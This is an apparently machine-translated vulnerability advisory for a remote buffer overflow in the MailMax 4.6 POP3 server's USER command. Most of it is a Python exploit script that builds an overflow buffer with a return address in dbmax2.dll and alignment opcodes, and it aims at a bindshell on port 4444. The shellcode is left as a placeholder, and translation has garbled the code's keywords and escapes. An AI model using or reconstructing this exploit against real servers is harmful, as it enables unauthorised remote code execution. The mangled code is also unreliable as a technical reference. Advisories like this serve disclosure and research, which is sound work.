MailMax 'user' POP3 Command Remote Buffer Overflow Vulnerability

Release date:
Updated on: 2012-04-17

Affected Systems:
SmartMax Software MailMax 4.6
Description:
--------------------------------------------------------------------------------
Bugtraq id: 52838

MailMax is an extensible EMAIL server that supports SMTP, IMAP4, and POP3 protocols. Its TCP/IP GUI allows server administrators to connect to the server from the Internet.

MailMax has a security vulnerability. Attackers can exploit this vulnerability to execute arbitrary code.

<* Source: localh0t
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Localh0t () provides the following test methods:

#! /Usr/bin/python

# MailMax <= v4.6 POP3 "USER" Remote Buffer Overflow Exploit (No Login Needed)
# Newer version's not tested, maybe vulnerable too
# A hard one this, the shellcode MUST be lowercase. Plus there are still opcode's that break
# The payload and opcodes that gets changed, like "\ xc3" gets converted to "\ xe3", and "\ xd3" gets converted to "\ xf3"
# Written by localh0t
# Date: 29/03/12
# Contact: mattdch0@gmail.com
# Follow: @ mattdch
# Www.localh0t.com. ar
# Tested on: Windows XP SP3 Spanish (No DEP)
# Targets: Windows (All) (DEP Disabled)
# Shellcode: Bindshell on port 4444 (Change as you wish) (Lowercase Only, use EBX as baseaddr)

From socket import *
Import sys, struct, OS, time

If (len (sys. argv) <3 ):
Print "\ nMailMax <= v4.6 POP3 \" USER \ "Remote Buffer Overflow Exploit (No Login Needed )"
Print "\ n Usage: % s Sys. exit ()

Print "\ n [!] Connecting to % s... "% (sys. argv [1])

# Connect to host
Sock = socket (AF_INET, SOCK_STREAM)
Sock. connect (sys. argv [1], int (sys. argv [2])
Sock. recv (1024)
Time. sleep (5)

Buffer = "USER"
Buffer + = "A" * 1439 # padding
Buffer + = "\ xEB \ x06 \ x90 \ x90" # Short jmp (6 bytes)
Buffer + = "\ x86 \ xb3 \ x02 \ x10" # pop | ret 1c, dbmax2.dll
Buffer + = "\ x90" * 8 # nops (just to be sure)

# Popad's, so esp => shellcode
Buffer ++ = "\ x61" * 145
# Nop's to align
Buffer + = "\ x90" * 11
# And ebx, esp
Buffer + = "\ x21 \ xe3"
# Or ebx, esp
Buffer + = "\ x09 \ xe3"
# At this point, ebx = esp. The shellcode is lowercase (with numbers), baseaddr = EBX
Buffer + = ("bytes ")

Buffer + = "\ x90" * 2000
Buffer + = "\ r \ n"
Print "[!] Sending exploit ..."
Sock. send (buffer)
Sock. close ()
Print "[!] Exploit succeed. Now netcat % s on port 4444 \ n "% (sys. argv [1])
Sys. exit ()

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

SmartMax Software
-----------------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.smartmax.com